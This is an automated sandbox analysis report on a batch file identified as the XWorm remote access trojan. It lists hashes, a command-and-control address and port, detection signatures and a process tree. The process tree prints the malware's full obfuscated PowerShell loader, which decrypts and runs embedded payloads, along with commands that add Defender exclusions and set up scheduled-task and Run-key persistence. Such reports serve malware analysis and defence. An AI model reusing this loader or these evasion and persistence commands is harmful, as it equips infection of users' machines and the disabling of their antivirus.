Analysis
-
max time kernel
128s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
22-05-2024 13:04
Static task
static1
Behavioral task
behavioral1
Sample
MonkerV1GuiTest.bat
Resource
win10-20240404-en
General
-
Target
MonkerV1GuiTest.bat
-
Size
294KB
-
MD5
2b235c5e792b8c3dcbc4ccd0ccff02de
-
SHA1
6dd8fac6545df5f64bda4e746f3921d9a072bb59
-
SHA256
ebd66fd9265f312babcebc214c9e23433e0c0e88504c5859f034bdacffd54ddb
-
SHA512
cf61c50763cf8656bfb23250553052c1191179d30b50884f1cf8dcae64be48eae8dc43b9ccdb453e38e71bd4f5cfe94f8d44e86ba80552232eacdf23bac99e2f
-
SSDEEP
6144:6pA2upleIJqLKXd33GCpiMcOa+7seZEN3CbryZPhvAF8:6pAdpwoqa93GO2Oa+tON3CbGvf
Malware Config
Extracted
xworm
135.125.21.87:7000
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1580-115-0x000001F4FD760000-0x000001F4FD778000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1580 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1360 powershell.exe 4644 powershell.exe 1580 powershell.exe 3952 powershell.exe 1912 powershell.exe 4616 powershell.exe 1824 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Win32pid process 2356 Win32 -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\Win32 = "C:\\Users\\Admin\\AppData\\Roaming\\Win32" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWin32pid process 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 3952 powershell.exe 3952 powershell.exe 3952 powershell.exe 1912 powershell.exe 1912 powershell.exe 1912 powershell.exe 4616 powershell.exe 4616 powershell.exe 4616 powershell.exe 1824 powershell.exe 1824 powershell.exe 1824 powershell.exe 1580 powershell.exe 2356 Win32 2356 Win32 2356 Win32 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeIncreaseQuotaPrivilege 4644 powershell.exe Token: SeSecurityPrivilege 4644 powershell.exe Token: SeTakeOwnershipPrivilege 4644 powershell.exe Token: SeLoadDriverPrivilege 4644 powershell.exe Token: SeSystemProfilePrivilege 4644 powershell.exe Token: SeSystemtimePrivilege 4644 powershell.exe Token: SeProfSingleProcessPrivilege 4644 powershell.exe Token: SeIncBasePriorityPrivilege 4644 powershell.exe Token: SeCreatePagefilePrivilege 4644 powershell.exe Token: SeBackupPrivilege 4644 powershell.exe Token: SeRestorePrivilege 4644 powershell.exe Token: SeShutdownPrivilege 4644 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeSystemEnvironmentPrivilege 4644 powershell.exe Token: SeRemoteShutdownPrivilege 4644 powershell.exe Token: SeUndockPrivilege 4644 powershell.exe Token: SeManageVolumePrivilege 4644 powershell.exe Token: 33 4644 powershell.exe Token: 34 4644 powershell.exe Token: 35 4644 powershell.exe Token: 36 4644 powershell.exe Token: SeIncreaseQuotaPrivilege 4644 powershell.exe Token: SeSecurityPrivilege 4644 powershell.exe Token: SeTakeOwnershipPrivilege 4644 powershell.exe Token: SeLoadDriverPrivilege 4644 powershell.exe Token: SeSystemProfilePrivilege 4644 powershell.exe Token: SeSystemtimePrivilege 4644 powershell.exe Token: SeProfSingleProcessPrivilege 4644 powershell.exe Token: SeIncBasePriorityPrivilege 4644 powershell.exe Token: SeCreatePagefilePrivilege 4644 powershell.exe Token: SeBackupPrivilege 4644 powershell.exe Token: SeRestorePrivilege 4644 powershell.exe Token: SeShutdownPrivilege 4644 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeSystemEnvironmentPrivilege 4644 powershell.exe Token: SeRemoteShutdownPrivilege 4644 powershell.exe Token: SeUndockPrivilege 4644 powershell.exe Token: SeManageVolumePrivilege 4644 powershell.exe Token: 33 4644 powershell.exe Token: 34 4644 powershell.exe Token: 35 4644 powershell.exe Token: 36 4644 powershell.exe Token: SeIncreaseQuotaPrivilege 4644 powershell.exe Token: SeSecurityPrivilege 4644 powershell.exe Token: SeTakeOwnershipPrivilege 4644 powershell.exe Token: SeLoadDriverPrivilege 4644 powershell.exe Token: SeSystemProfilePrivilege 4644 powershell.exe Token: SeSystemtimePrivilege 4644 powershell.exe Token: SeProfSingleProcessPrivilege 4644 powershell.exe Token: SeIncBasePriorityPrivilege 4644 powershell.exe Token: SeCreatePagefilePrivilege 4644 powershell.exe Token: SeBackupPrivilege 4644 powershell.exe Token: SeRestorePrivilege 4644 powershell.exe Token: SeShutdownPrivilege 4644 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeSystemEnvironmentPrivilege 4644 powershell.exe Token: SeRemoteShutdownPrivilege 4644 powershell.exe Token: SeUndockPrivilege 4644 powershell.exe Token: SeManageVolumePrivilege 4644 powershell.exe Token: 33 4644 powershell.exe Token: 34 4644 powershell.exe Token: 35 4644 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1580 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exedescription pid process target process PID 660 wrote to memory of 1568 660 cmd.exe net.exe PID 660 wrote to memory of 1568 660 cmd.exe net.exe PID 1568 wrote to memory of 1964 1568 net.exe net1.exe PID 1568 wrote to memory of 1964 1568 net.exe net1.exe PID 660 wrote to memory of 1360 660 cmd.exe powershell.exe PID 660 wrote to memory of 1360 660 cmd.exe powershell.exe PID 1360 wrote to memory of 4644 1360 powershell.exe powershell.exe PID 1360 wrote to memory of 4644 1360 powershell.exe powershell.exe PID 1360 wrote to memory of 5040 1360 powershell.exe WScript.exe PID 1360 wrote to memory of 5040 1360 powershell.exe WScript.exe PID 5040 wrote to memory of 3736 5040 WScript.exe cmd.exe PID 5040 wrote to memory of 3736 5040 WScript.exe cmd.exe PID 3736 wrote to memory of 608 3736 cmd.exe net.exe PID 3736 wrote to memory of 608 3736 cmd.exe net.exe PID 608 wrote to memory of 1816 608 net.exe net1.exe PID 608 wrote to memory of 1816 608 net.exe net1.exe PID 3736 wrote to memory of 1580 3736 cmd.exe powershell.exe PID 3736 wrote to memory of 1580 3736 cmd.exe powershell.exe PID 1580 wrote to memory of 3952 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 3952 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 1912 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 1912 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 4616 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 4616 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 1824 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 1824 1580 powershell.exe powershell.exe PID 1580 wrote to memory of 4756 1580 powershell.exe schtasks.exe PID 1580 wrote to memory of 4756 1580 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YEfma8Fsqpo8Nxcmsh2LlMT5phz3RC1od46Bs4haKuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bS7q7G7pSQFFezaTbyErVA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HUiNZ=New-Object System.IO.MemoryStream(,$param_var); $wYjxe=New-Object System.IO.MemoryStream; $eamGN=New-Object System.IO.Compression.GZipStream($HUiNZ, [IO.Compression.CompressionMode]::Decompress); $eamGN.CopyTo($wYjxe); $eamGN.Dispose(); $HUiNZ.Dispose(); $wYjxe.Dispose(); $wYjxe.ToArray();}function execute_function($param_var,$param2_var){ $ddqEY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KPhFH=$ddqEY.EntryPoint; $KPhFH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat';$zudcm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat').Split([Environment]::NewLine);foreach ($XVfwy in $zudcm) { if ($XVfwy.StartsWith(':: ')) { $bxXKt=$XVfwy.Substring(3); break; }}$payloads_var=[string[]]$bxXKt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_699_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_699.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_699.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_699.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YEfma8Fsqpo8Nxcmsh2LlMT5phz3RC1od46Bs4haKuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bS7q7G7pSQFFezaTbyErVA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HUiNZ=New-Object System.IO.MemoryStream(,$param_var); $wYjxe=New-Object System.IO.MemoryStream; $eamGN=New-Object System.IO.Compression.GZipStream($HUiNZ, [IO.Compression.CompressionMode]::Decompress); $eamGN.CopyTo($wYjxe); $eamGN.Dispose(); $HUiNZ.Dispose(); $wYjxe.Dispose(); $wYjxe.ToArray();}function execute_function($param_var,$param2_var){ $ddqEY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KPhFH=$ddqEY.EntryPoint; $KPhFH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_699.bat';$zudcm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_699.bat').Split([Environment]::NewLine);foreach ($XVfwy in $zudcm) { if ($XVfwy.StartsWith(':: ')) { $bxXKt=$XVfwy.Substring(3); break; }}$payloads_var=[string[]]$bxXKt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Win32'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Win32'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Win32" /tr "C:\Users\Admin\AppData\Roaming\Win32"6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Win32C:\Users\Admin\AppData\Roaming\Win321⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d4ac7391fd23c0ad0c6ed9c7ea98f287
SHA1683431e2fe4aafac6e66b0beb72581713e6076f4
SHA25631babb713b3b56c572a38cfa0c2cd7bbdf7da7be759c507c683a5e579f3bdce2
SHA512b10dabd1c3b09e6b7fb4aba542907f659c77ecd86f574b6edfe60a3d7d2a214ba9a0763fc5c14daf152b0e39b10e6d981bfdafceac5fa0e338cd21450febb424
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51d4a155a1b0b1cbfcfb8fe6a7613cc24
SHA103457d9128ada0e15f979429f52b89dba27d12b0
SHA2569b6e2eeddd54e7ef329df2a85a1b256c61a02d3bf0593210e5211f26d720518d
SHA51260c25309198f287d213d6a2c5a953335eb98d29a795851bf17464a5980842488f7122f07fe308b34fe59b802a33cea936c44a402ae04d98236a8517fa23df16b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58e9fc5e3884e45406faacc5e195eaa72
SHA153b522ee43f9539378c247cd333a422e46e3680a
SHA2560c9156566c600c32b4103c10725fffc2311bad19f20fd4797bfb537855fa059a
SHA512cfe05edabb1f654f3dc86c73a182a986d0ece1b32401d5e7fdb8965cdd2765ec82251047d3d53d123c15171b8d158edba12243603d5d3efa375f909722fecde0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD59877c90918d6a2a5838c96ed9ae4b1e6
SHA10f42e3c9f458dcc7a4b36314f9626b79ee1b3372
SHA256fa49f3172eb4a081619a06ca5fa0117e89b8678ef1f8acee1a08f1a803110443
SHA51228d3119dc6d621363ad848a0e7e8f8c0552d48b05d037cde42f13a2bcbfb545f60362adb65c3445844372f5e40affb6a058045b941c6fb2bc72116eca6226d8b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojirqle0.g3m.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\Win32Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
C:\Users\Admin\AppData\Roaming\startup_str_699.batFilesize
294KB
MD52b235c5e792b8c3dcbc4ccd0ccff02de
SHA16dd8fac6545df5f64bda4e746f3921d9a072bb59
SHA256ebd66fd9265f312babcebc214c9e23433e0c0e88504c5859f034bdacffd54ddb
SHA512cf61c50763cf8656bfb23250553052c1191179d30b50884f1cf8dcae64be48eae8dc43b9ccdb453e38e71bd4f5cfe94f8d44e86ba80552232eacdf23bac99e2f
-
C:\Users\Admin\AppData\Roaming\startup_str_699.vbsFilesize
115B
MD5f308d5d131313424fee9aedafb2e1a66
SHA11a61c5f5051f5ca027bf2e0431b963fe4442fbe7
SHA2561c59e31ca06a1649b5c36a3d230278f45efc921a229b72dc0f47c9c485963ac9
SHA512132f35947428e4347386b0da111f2ceff1e71b75799b3a9ca00d963cf662eac75c84f8fa6a720cb0fe8cc1c8bb37842843d42fb0b07c0a3f564806a4cb6efa3c
-
memory/1360-12-0x0000011DD7940000-0x0000011DD79B6000-memory.dmpFilesize
472KB
-
memory/1360-29-0x0000011DBF7E0000-0x0000011DBF81A000-memory.dmpFilesize
232KB
-
memory/1360-28-0x0000011DBF7D0000-0x0000011DBF7D8000-memory.dmpFilesize
32KB
-
memory/1360-23-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/1360-3-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/1360-7-0x0000011DBF760000-0x0000011DBF782000-memory.dmpFilesize
136KB
-
memory/1360-6-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/1360-5-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/1360-89-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/1580-115-0x000001F4FD760000-0x000001F4FD778000-memory.dmpFilesize
96KB
-
memory/2356-337-0x0000026A78BB0000-0x0000026A78BEC000-memory.dmpFilesize
240KB
-
memory/4644-75-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/4644-42-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/4644-43-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB
-
memory/4644-41-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmpFilesize
1.9MB